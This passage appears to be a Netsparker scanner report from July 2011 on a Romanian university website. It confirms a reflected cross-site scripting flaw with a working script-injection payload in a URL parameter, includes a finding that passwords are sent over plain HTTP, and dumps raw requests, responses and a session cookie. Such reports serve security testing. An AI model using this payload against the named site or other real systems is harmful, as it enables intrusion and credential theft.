<meta name="keywords" content="" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link type="text/css" rel="stylesheet" href="/css/common.css" /><link type="text/css" rel="stylesheet" href="/css/paging.css" /><link type="text/css" rel="stylesheet" href="/css/simplemodal.css" /><link type="text/css" rel="stylesheet" href="/css/thickbox.css" /><link type="text/css" rel="stylesheet" href="/css/search.css" /> <script type="text/javascript" src="/js/search.js"></script> <script type="text/javascript" src="/js/jquery.js"></script>
<script type="text/javascript" src="/js/jquery-ui.js"></script>
<script type="text/javascript" src="/js/jquery.hoverIntent.js"></script>
<script type="text/javascript" src="/js/jquery.emptyOnFocus.js"></script>
<script type="text/javascript" src="/js/jquery.alphanumeric.js"></script>
<script type="text/javascript" src="/js/jquery.simplemodal.js"></script>
<script type="text/javascript" src="/js/jquery.validate.js"></script>
<script type="text/javascript" src="/js/jquery.thickbox.js"></script>
<script type="text/javascript" src="/js/common.js"></script>
<script type="text/javascript" src="/js/globalizationen-GB.js"></script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>

<link type="text/css" rel="stylesheet" href="/css/lightbox.css" /> <script type="text/javascript" src="/js/jquery.lightbox.js"></script> <script type="text/javascript" src="/js/jquery.qGallery.js"></script> <link rel="stylesheet" type="text/css" href="/css/paging.css" /><title>

</title></head>
<body class="en-GB" id="listaPage">
<form name="aspnetForm" method="post" action="lista.aspx?t=%22%3e%3cscript%3enetsparker(9)%3c%2fscript%3e&amp;y=2011&amp;m=7" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwMjEzOTE2MTVkZA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=PsRJDDMJscQZi9Ce6WIaqNcJm9qD4oZbuj0e0cvS49Oclg_D1D9Ia36SFWSTU_w_z5Hn_JRB35Zoryx_6ILPzzT48KU1&amp;t=634210472612724343" type="text/javascript"></script>

<div>

<input type="hidden" name="__SCROLLPOSITIONX" id="__SCROLLPOSITIONX" value="0" />
<input type="hidden" name="__SCROLLPOSITIONY" id="__SCROLLPOSITIONY" value="0" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALi3Yf6AgLhw6AyAuzu3YUFAv/frr4K" />
</div>
<input type="hidden" id="hCulture" value="en-GB" />

<div id="headerAll">

<div id="header" class="easyclear">
<div id="ctl00_logo"><a href="/">UMF</a></div>



<div id="lang">
<ul>

<li><a class="fr-FR " href="/fr"><label>Francais</label><span></span></a></li>



<li><a class="en-GB active" href="/en"><label>English</label><span></span></a></li>



<li><a class="ro-RO " href="/ro"><label>Romana</label><span></span></a></li>



</ul>
</div>


<div>
<fieldset id="search">
<!--<legend>Cauta produse</legend>-->
<label for="ctl00_txSearch">Search in site</label>
<input id="txSearch" class="txSearch" type="text" onkeyup="searchOnEnter(event);" />
<input id="searchSubmit" class="button" type="button" onclick="doSearch();" />
</fieldset>
</div>

<div id="aboutNav">

<ul> <li class=""><a class="" href="/">Home page</a> <ul> </ul> </li> <li class=""><a class="" href="/sitemap.aspx">Sitemap</a> <ul> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Harta-Digitala">Digital Map</a> <ul> </ul> </li> </ul>
<hr />
</div>



<!--<div id="userNav">

<ul>
<li><a href="/Inregistrare.aspx">Sign up</a></li>
<li><a href="/Autentificare.aspx">Login</a></li>
</ul>

</div>-->



<!--<div id="inlineCartBar">
<div class="finalizeOrderDiv"><a class="finalizeOrder" href="/finalizareComanda.aspx">Checkout</a></div>
<div id="inlineCartWrapper">
<a id="showInlineCart" href="#inlineCartDetails">View cart</a>
<div id="inlineCart">
<ul><li></li></ul>
<div class="total easyclear">
<span>Total</span>
<strong></strong>
</div>
<div id="noProducts">There is no product in your cart</div>
<div id="buyButtons"></div>
<div class="hideBorder"></div>
</div>
</div>
<h4 class="noProducts">There is no product in your cart</h4> <span class="produseInCos"></span>
</div>-->



</div>

</div>
<!--<div id="wrapOuter">
<div class="tr">
<div class="bl">
<div class="br">-->
<div id="wrap" class="easyclear">


<div id="contextual" class="easyclear">
<img height="200" alt="" width="588" src="/Images/FCK/image/bgContextual.gif" /><br />

</div>


<!--<div id="breadcrumbs"></div>-->


<div id="leftSide">
<div id="tabs">
<ul> <li class=""><a class="" href="#">Information for</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Admitere-Prezentare" onclick="document.location.href='/lista.aspx?t=Admitere-Prezentare'"><span class="dN">In section </span>Admission<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">University Presentation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Admitere-2011" onclick="document.location.href='/Detaliu.aspx?t=Admitere-2011'">Application for 2011</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studenti-actuali-Prezentare" onclick="document.location.href='/lista.aspx?t=Studenti-actuali-Prezentare'"><span class="dN">In section </span>Current Students<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="#" onclick="document.location.href='#'">Educational Offer</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information for Students</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Organizatii-studentesti" onclick="document.location.href='/lista.aspx?t=Organizatii-studentesti'">Student Organizations</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Masterat-Prezentare" onclick="document.location.href='/lista.aspx?t=Masterat-Prezentare'"><span class="dN">In section </span>Master’s Degree<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="#" onclick="document.location.href='#'">Contact Information </a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information for MA Students</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=RezidentiatPrezentare" onclick="document.location.href='/lista.aspx?t=RezidentiatPrezentare'"><span class="dN">In section </span>Residency<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=RezidentiatDatedecontact" onclick="document.location.href='/Detaliu.aspx?t=RezidentiatDatedecontact'">Contact Information</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information regarding Residency</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Doctorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Doctorat-Prezentare'"><span class="dN">In section </span>Doctoral Studies<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Date-de-contact'">Presentation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale'">Graduate School Organisation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale'">Graduate School activity </a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=DoctoratBiroudeConsiliereCariera" onclick="document.location.href='/lista.aspx?t=DoctoratBiroudeConsiliereCariera'">Career orientation department</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studii-posuniversitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Studii-posuniversitare-Prezentare'"><span class="dN">In section </span>Post University Studies<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact'">Contact Information </a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information for Post University Studies </a> <ul class="dN"> </ul> </li> </ul> </li> </ul> </li> <li class=""><a class="" href="#">Information about</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Universitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Universitare-Prezentare'"><span class="dN">In section </span>University<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">The Rector’s Office</a> <ul class="dN"> <li class=""><a class="" href="/Detaliu.aspx?t=Rectorat-Prezentare&eID=62&c=0&m=0&y=0" onclick="document.location.href='/Detaliu.aspx?t=Rectorat-Prezentare&eID=62&c=0&m=0&y=0'">The Rector’s Mesage</a></li> <li class=""><a class="" href="/Detaliu.aspx?t=Rectorat-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Rectorat-Date-de-contact'">Contact Information</a></li> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Structuri-de-conducere-ale-Universitatiii" onclick="document.location.href='/lista.aspx?t=Rectorat-Structuri..
- /lista.aspx

/lista.aspx CONFIRMED

http://umfcluj.ro/lista.aspx?t=%22%3E%3Cscript%3Ealert(9)%3C/script%3E

Parameters

Parameter Type Value
t GET "><script>alert(9)</script>
__EVENTARGUMENT POST 3
__EVENTTARGET POST 3
__EVENTVALIDATION POST /wEWBALi3Yf6AgLhw6AyAuzu3YUFAv/frr4K
__SCROLLPOSITIONX POST 0
__SCROLLPOSITIONY POST 0
__VIEWSTATE POST /wEPDwULLTIwMjEzOTE2MTVkZA==
ctl00$hAction POST 3
ctl00$txName POST Smith
ctl00$txNewsletter POST 3

Request

POST /lista.aspx?t=%22%3E%3Cscript%3Enetsparker(9)%3C/script%3E HTTP/1.1
Referer: http://umfcluj.ro/lista.aspx?t=Admitere-Prezentare
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 235
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBALi3Yf6AgLhw6AyAuzu3YUFAv%2ffrr4K&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__VIEWSTATE=%2fwEPDwULLTIwMjEzOTE2MTVkZA%3d%3d&ctl00$hAction=3&ctl00$txName=Smith&ctl00$txNewsletter=3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:18:29 GMT
Content-Length: 60278



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content="" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link type="text/css" rel="stylesheet" href="/css/common.css" /><link type="text/css" rel="stylesheet" href="/css/paging.css" /><link type="text/css" rel="stylesheet" href="/css/simplemodal.css" /><link type="text/css" rel="stylesheet" href="/css/thickbox.css" /><link type="text/css" rel="stylesheet" href="/css/search.css" /> <script type="text/javascript" src="/js/search.js"></script> <script type="text/javascript" src="/js/jquery.js"></script>
<script type="text/javascript" src="/js/jquery-ui.js"></script>
<script type="text/javascript" src="/js/jquery.hoverIntent.js"></script>
<script type="text/javascript" src="/js/jquery.emptyOnFocus.js"></script>
<script type="text/javascript" src="/js/jquery.alphanumeric.js"></script>
<script type="text/javascript" src="/js/jquery.simplemodal.js"></script>
<script type="text/javascript" src="/js/jquery.validate.js"></script>
<script type="text/javascript" src="/js/jquery.thickbox.js"></script>
<script type="text/javascript" src="/js/common.js"></script>
<script type="text/javascript" src="/js/globalizationen-GB.js"></script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>

<link type="text/css" rel="stylesheet" href="/css/lightbox.css" /> <script type="text/javascript" src="/js/jquery.lightbox.js"></script> <script type="text/javascript" src="/js/jquery.qGallery.js"></script> <link rel="stylesheet" type="text/css" href="/css/paging.css" /><title>

</title></head>
<body class="en-GB" id="listaPage">
<form name="aspnetForm" method="post" action="lista.aspx?t=%22%3e%3cscript%3enetsparker(9)%3c%2fscript%3e" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwMjEzOTE2MTVkZA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=PsRJDDMJscQZi9Ce6WIaqNcJm9qD4oZbuj0e0cvS49Oclg_D1D9Ia36SFWSTU_w_z5Hn_JRB35Zoryx_6ILPzzT48KU1&amp;t=634210472612724343" type="text/javascript"></script>

<div>

<input type="hidden" name="__SCROLLPOSITIONX" id="__SCROLLPOSITIONX" value="0" />
<input type="hidden" name="__SCROLLPOSITIONY" id="__SCROLLPOSITIONY" value="0" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALi3Yf6AgLhw6AyAuzu3YUFAv/frr4K" />
</div>
<input type="hidden" id="hCulture" value="en-GB" />

<div id="headerAll">

<div id="header" class="easyclear">
<div id="ctl00_logo"><a href="/">UMF</a></div>



<div id="lang">
<ul>

<li><a class="fr-FR " href="/fr"><label>Francais</label><span></span></a></li>



<li><a class="en-GB active" href="/en"><label>English</label><span></span></a></li>



<li><a class="ro-RO " href="/ro"><label>Romana</label><span></span></a></li>



</ul>
</div>


<div>
<fieldset id="search">
<!--<legend>Cauta produse</legend>-->
<label for="ctl00_txSearch">Search in site</label>
<input id="txSearch" class="txSearch" type="text" onkeyup="searchOnEnter(event);" />
<input id="searchSubmit" class="button" type="button" onclick="doSearch();" />
</fieldset>
</div>

<div id="aboutNav">

<ul> <li class=""><a class="" href="/">Home page</a> <ul> </ul> </li> <li class=""><a class="" href="/sitemap.aspx">Sitemap</a> <ul> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Harta-Digitala">Digital Map</a> <ul> </ul> </li> </ul>
<hr />
</div>



<!--<div id="userNav">

<ul>
<li><a href="/Inregistrare.aspx">Sign up</a></li>
<li><a href="/Autentificare.aspx">Login</a></li>
</ul>

</div>-->



<!--<div id="inlineCartBar">
<div class="finalizeOrderDiv"><a class="finalizeOrder" href="/finalizareComanda.aspx">Checkout</a></div>
<div id="inlineCartWrapper">
<a id="showInlineCart" href="#inlineCartDetails">View cart</a>
<div id="inlineCart">
<ul><li></li></ul>
<div class="total easyclear">
<span>Total</span>
<strong></strong>
</div>
<div id="noProducts">There is no product in your cart</div>
<div id="buyButtons"></div>
<div class="hideBorder"></div>
</div>
</div>
<h4 class="noProducts">There is no product in your cart</h4> <span class="produseInCos"></span>
</div>-->



</div>

</div>
<!--<div id="wrapOuter">
<div class="tr">
<div class="bl">
<div class="br">-->
<div id="wrap" class="easyclear">


<div id="contextual" class="easyclear">
<img height="200" alt="" width="588" src="/Images/FCK/image/bgContextual.gif" /><br />

</div>


<!--<div id="breadcrumbs"></div>-->


<div id="leftSide">
<div id="tabs">
<ul> <li class=""><a class="" href="#">Information for</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Admitere-Prezentare" onclick="document.location.href='/lista.aspx?t=Admitere-Prezentare'"><span class="dN">In section </span>Admission<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">University Presentation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Admitere-2011" onclick="document.location.href='/Detaliu.aspx?t=Admitere-2011'">Application for 2011</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studenti-actuali-Prezentare" onclick="document.location.href='/lista.aspx?t=Studenti-actuali-Prezentare'"><span class="dN">In section </span>Current Students<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="#" onclick="document.location.href='#'">Educational Offer</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information for Students</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Organizatii-studentesti" onclick="document.location.href='/lista.aspx?t=Organizatii-studentesti'">Student Organizations</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Masterat-Prezentare" onclick="document.location.href='/lista.aspx?t=Masterat-Prezentare'"><span class="dN">In section </span>Master’s Degree<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="#" onclick="document.location.href='#'">Contact Information </a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information for MA Students</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=RezidentiatPrezentare" onclick="document.location.href='/lista.aspx?t=RezidentiatPrezentare'"><span class="dN">In section </span>Residency<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=RezidentiatDatedecontact" onclick="document.location.href='/Detaliu.aspx?t=RezidentiatDatedecontact'">Contact Information</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information regarding Residency</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Doctorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Doctorat-Prezentare'"><span class="dN">In section </span>Doctoral Studies<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Date-de-contact'">Presentation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale'">Graduate School Organisation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale'">Graduate School activity </a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=DoctoratBiroudeConsiliereCariera" onclick="document.location.href='/lista.aspx?t=DoctoratBiroudeConsiliereCariera'">Career orientation department</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studii-posuniversitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Studii-posuniversitare-Prezentare'"><span class="dN">In section </span>Post University Studies<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact'">Contact Information </a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information for Post University Studies </a> <ul class="dN"> </ul> </li> </ul> </li> </ul> </li> <li class=""><a class="" href="#">Information about</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Universitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Universitare-Prezentare'"><span class="dN">In section </span>University<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">The Rector’s Office</a> <ul class="dN"> <li class=""><a class="" href="/Detaliu.aspx?t=Rectorat-Prezentare&eID=62&c=0&m=0&y=0" onclick="document.location.href='/Detaliu.aspx?t=Rectorat-Prezentare&eID=62&c=0&m=0&y=0'">The Rector’s Mesage</a></li> <li class=""><a class="" href="/Detaliu.aspx?t=Rectorat-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Rectorat-Date-de-contact'">Contact Information</a></li> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Structuri-de-conducere-ale-Universitatiii" onclick="document.location.href='/lista.aspx?t=Rectorat-Structuri-de-conducere-ale-Universit..
Password Transmitted Over HTTP

Password Transmitted Over HTTP
1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /Autentificare.aspx

/Autentificare.aspx CONFIRMED

http://umfcluj.ro/Autentificare.aspx?action=order

Form target action

Autentificare.aspx?action=order

Request

POST /Autentificare.aspx?action=order HTTP/1.1
Referer: http://umfcluj.ro/Autentificare.aspx?action=order
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 454
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCQLVqpWzDgLhw6AyAuzu3YUFAp33gboIArGcpLcEAvzY8J0GAv%2fFkO0CApr7npELAv%2ffrr4K&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__VIEWSTATE=%2fwEPDwUKMjAxNDYzNDEwMg9kFgJmD2QWAgICD2QWAgIID2QWBgIBDxYCHgdWaXNpYmxlZ2QCBA8WAh8AaGQCBQ8WAh8AaGRk&ctl00$cpBody$btnContNou=&ctl00$cpBody$btnMaiDeparte=&ctl00$cpBody$hAction=&ctl00$cpBody$txEmail=&ctl00$cpBody$txPassword=&ctl00$hAction=&ctl00$txName=&ctl00$txNewsletter=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:15:32 GMT
Content-Length: 38980



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content="" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link type="text/css" rel="stylesheet" href="/css/common.css" /><link type="text/css" rel="stylesheet" href="/css/paging.css" /><link type="text/css" rel="stylesheet" href="/css/simplemodal.css" /><link type="text/css" rel="stylesheet" href="/css/thickbox.css" /><link type="text/css" rel="stylesheet" href="/css/search.css" /> <script type="text/javascript" src="/js/search.js"></script> <script type="text/javascript" src="/js/jquery.js"></script>
<script type="text/javascript" src="/js/jquery-ui.js"></script>
<script type="text/javascript" src="/js/jquery.hoverIntent.js"></script>
<script type="text/javascript" src="/js/jquery.emptyOnFocus.js"></script>
<script type="text/javascript" src="/js/jquery.alphanumeric.js"></script>
<script type="text/javascript" src="/js/jquery.simplemodal.js"></script>
<script type="text/javascript" src="/js/jquery.validate.js"></script>
<script type="text/javascript" src="/js/jquery.thickbox.js"></script>
<script type="text/javascript" src="/js/common.js"></script>
<script type="text/javascript" src="/js/globalizationfr-FR.js"></script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>


<script type="text/javascript" src="/js/login.js"></script>
<script type="text/javascript" src="/js/validation.js"></script>
<title>

</title></head>
<body class="fr-FR" >
<form name="aspnetForm" method="post" action="Autentificare.aspx?action=order" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMjAxNDYzNDEwMg9kFgJmD2QWAgICD2QWAgIID2QWBgIBDxYCHgdWaXNpYmxlZ2QCBA8WAh8AaGQCBQ8WAh8AaGRk" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=PsRJDDMJscQZi9Ce6WIaqNcJm9qD4oZbuj0e0cvS49Oclg_D1D9Ia36SFWSTU_w_z5Hn_JRB35Zoryx_6ILPzzT48KU1&amp;t=634210472612724343" type="text/javascript"></script>

<div>

<input type="hidden" name="__SCROLLPOSITIONX" id="__SCROLLPOSITIONX" value="0" />
<input type="hidden" name="__SCROLLPOSITIONY" id="__SCROLLPOSITIONY" value="0" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWCQLVqpWzDgLhw6AyAuzu3YUFAp33gboIArGcpLcEAvzY8J0GAv/FkO0CApr7npELAv/frr4K" />
</div>
<input type="hidden" id="hCulture" value="fr-FR" />

<div id="headerAll">

<div id="header" class="easyclear">
<div id="ctl00_logo"><a href="/">UMF</a></div>



<div id="lang">
<ul>

<li><a class="fr-FR active" href="/fr"><label>Francais</label><span></span></a></li>



<li><a class="en-GB " href="/en"><label>English</label><span></span></a></li>



<li><a class="ro-RO " href="/ro"><label>Romana</label><span></span></a></li>



</ul>
</div>


<div>
<fieldset id="search">
<!--<legend>Cauta produse</legend>-->
<label for="ctl00_txSearch">Rechercher dans le site</label>
<input id="txSearch" class="txSearch" type="text" onkeyup="searchOnEnter(event);" />
<input id="searchSubmit" class="button" type="button" onclick="doSearch();" />
</fieldset>
</div>

<div id="aboutNav">

<ul> <li class="active"><a class="active" href="/fr">Page d'accueil</a> <ul> </ul> </li> <li class="active"><a class="active" href="/sitemap.aspx">Carte du site </a> <ul> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Harta-Digitala">Carte digitale</a> <ul> </ul> </li> </ul>
<hr />
</div>



<!--<div id="userNav">

<ul>
<li><a href="/Inregistrare.aspx">Regisztrálás</a></li>
<li><a href="/Autentificare.aspx">Belépés</a></li>
</ul>

</div>-->



<!--<div id="inlineCartBar">
<div class="finalizeOrderDiv"><a class="finalizeOrder" href="/finalizareComanda.aspx">Rendelés véglegesítése</a></div>
<div id="inlineCartWrapper">
<a id="showInlineCart" href="#inlineCartDetails">Kosár megtekintése</a>
<div id="inlineCart">
<ul><li></li></ul>
<div class="total easyclear">
<span>Részösszeg</span>
<strong></strong>
</div>
<div id="noProducts">Nincs termék a kosárban</div>
<div id="buyButtons"></div>
<div class="hideBorder"></div>
</div>
</div>
<h4 class="noProducts">Nincs termék a kosárban</h4> <span class="produseInCos"></span>
</div>-->



</div>

</div>
<!--<div id="wrapOuter">
<div class="tr">
<div class="bl">
<div class="br">-->
<div id="wrap" class="easyclear">


<div id="contextual" class="easyclear">
<img height="200" width="588" alt="" src="/Images/FCK/image/bgContextual.gif" /><br />

</div>


<!--<div id="breadcrumbs"></div>-->


<div id="leftSide">
<div id="tabs">
<ul> <li class="active"><a class="active" href="#">Informations pour</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Admitere-Prezentare" onclick="document.location.href='/lista.aspx?t=Admitere-Prezentare'"><span class="dN">Dans la section </span>Admission<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">La présentation de l’ Université</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Admitere-2011" onclick="document.location.href='/Detaliu.aspx?t=Admitere-2011'">Candidatures pour 2011</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studenti-actuali-Prezentare" onclick="document.location.href='/lista.aspx?t=Studenti-actuali-Prezentare'"><span class="dN">Dans la section </span>Étudiants<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Studenti-actuali-Prezentare" 